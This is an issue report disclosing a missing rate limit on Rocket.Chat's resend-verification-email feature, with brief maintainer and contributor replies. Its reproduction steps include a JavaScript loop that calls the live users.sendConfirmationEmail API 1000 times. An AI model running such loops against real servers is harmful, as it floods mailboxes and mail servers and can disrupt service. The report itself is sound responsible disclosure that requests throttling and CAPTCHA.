Resend Verification Email Can Be Abused to Spam Mail Server

[JASIM0021]

Description:

The "Resend Verification Email" feature on the Rocket.Chat profile page can be exploited to send an unlimited number of verification emails in a short period of time. By copying the network request triggered by the "Resend" button and programmatically executing it in a loop (e.g., 1000 times), the server sends a verification email for each request without any rate limiting or throttling in place. This can result in email spam and potentially overload the mail server, leading to degraded performance or service disruption.

Steps to reproduce:

1. Navigate to: https://open.rocket.chat/account/profile

2. Below the email input, there's a "Resend Verification Email" button.

3. Click the button 3–4 times — you’ll receive the same number of verification emails.

4. Open your browser’s Network tab, and copy the fetch or cURL request for the resend action.

5. Using the browser console (or any script environment), run the same request in a loop (e.g., 1000 times).

Example:

function sendMail () {



    
fetch("https://open.rocket.chat/api/v1/users.sendConfirmationEmail", {
  "headers": {
    "accept": "application/json",
    "accept-language": "en-US,en;q=0.9",
    "content-type": "application/json",
    "priority": "u=1, i",
    "sec-ch-ua": "\"Chromium\";v=\"136\", \"Google Chrome\";v=\"136\", \"Not.A/Brand\";v=\"99\"",
    "sec-ch-ua-mobile": "?0",
    "sec-ch-ua-platform": "\"macOS\"",
    "sec-fetch-dest": "empty",
    "sec-fetch-mode": "cors",
    "sec-fetch-site": "same-origin",
    "x-auth-token": "<your-auth-token>",
    "x-user-id": "<user-user-id>"
  },
  "referrer": "https://open.rocket.chat/account/profile",
  "referrerPolicy": "same-origin",
  "body": "{\"email\":\"<your-email>\"}",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
}).then((data)=>data.json()).then((data)=>console.log(data,"data"))

}


let count = 0;
while (count < 1000) {
  sendMail();
  count++;
}

Expected behavior:

• The server should throttle or rate-limit resend email requests.

Ideally, add protections like:

• Minimum cooldown period (e.g., 3 email per X minutes)

• CAPTCHA after repeated requests

• Backend rate limiting and abuse prevention

Actual behavior:

The server sends a separate email for every request, even if they are triggered in rapid succession.

There are no rate limits, cooldowns, or CAPTCHA to prevent abuse.

This allows an attacker to flood the mail server, potentially causing performance degradation or a denial-of-service condition.

Server Setup Information:

• Version of Rocket.Chat Server:
• License Type:
• Number of Users:
• Operating System:
• Deployment Method:
• Number of Running Instances:
• DB Replicaset Oplog:
• NodeJS Version:
• MongoDB Version:

Client Setup Information

• Desktop App or Browser Version:Browser
• Operating System: Macos
• Workspace: https://open.rocket.chat/

Additional context

Relevant logs:

[reetp]

Nice!

Referred to team.

A PR might be good ;-)

[ABHYUDAYATIWARI]

same issue is on first time register page

[TrilokShetty]

Hello
Is this issue fixed ? If not please reply I will be happy to help

[JASIM0021]

Hello Is this issue fixed ? If not please reply I will be happy to help

Actually, one pr have been made to fix this issue, but if you'd like, you can still explore the codebase and the issue yourself. Feel free to review the code if you wish.